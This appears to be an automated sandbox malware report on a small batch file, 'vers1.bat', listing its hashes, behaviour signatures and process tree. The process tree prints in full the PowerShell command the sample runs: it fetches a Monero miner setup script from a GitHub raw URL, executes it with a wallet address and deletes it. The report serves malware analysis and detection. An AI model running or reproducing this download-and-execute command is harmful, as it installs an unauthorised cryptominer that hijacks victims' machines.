Overview
overview
10Static
static
1vers1.bat
windows10-2004-x64
10vers1.bat
windows10-1703-x64
10vers1.bat
windows7-x64
10vers1.bat
windows10-2004-x64
10vers1.bat
windows11-21h2-x64
10vers1.bat
android-9-x86
vers1.bat
android-10-x64
vers1.bat
android-11-x64
vers1.bat
macos-10.15-amd64
1vers1.bat
macos-10.15-amd64
1Analysis
-
max time kernel
4s -
max time network
5s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
25-06-2024 16:20
Static task
static1
Behavioral task
behavioral1
Sample
vers1.bat
Resource
win10v2004-20240611-en
Behavioral task
behavioral2
Sample
vers1.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
vers1.bat
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
vers1.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
vers1.bat
Resource
win11-20240419-en
Behavioral task
behavioral6
Sample
vers1.bat
Resource
android-x86-arm-20240624-en
Behavioral task
behavioral7
Sample
vers1.bat
Resource
android-x64-20240624-en
Behavioral task
behavioral8
Sample
vers1.bat
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral9
Sample
vers1.bat
Resource
macos-20240611-en
Behavioral task
behavioral10
Sample
vers1.bat
Resource
macos-20240611-en
General
-
Target
vers1.bat
-
Size
393B
-
MD5
ece9925dc634f1cc20e3fd7ff7a144bd
-
SHA1
8816112e72b7b64a668bf7214999d855a7e05bde
-
SHA256
a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f
-
SHA512
bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243
Malware Config
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1076 powershell.exe 6 1076 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
pid Process 1076 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1076 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2356 wrote to memory of 1076 2356 cmd.exe 29 PID 2356 wrote to memory of 1076 2356 cmd.exe 29 PID 2356 wrote to memory of 1076 2356 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-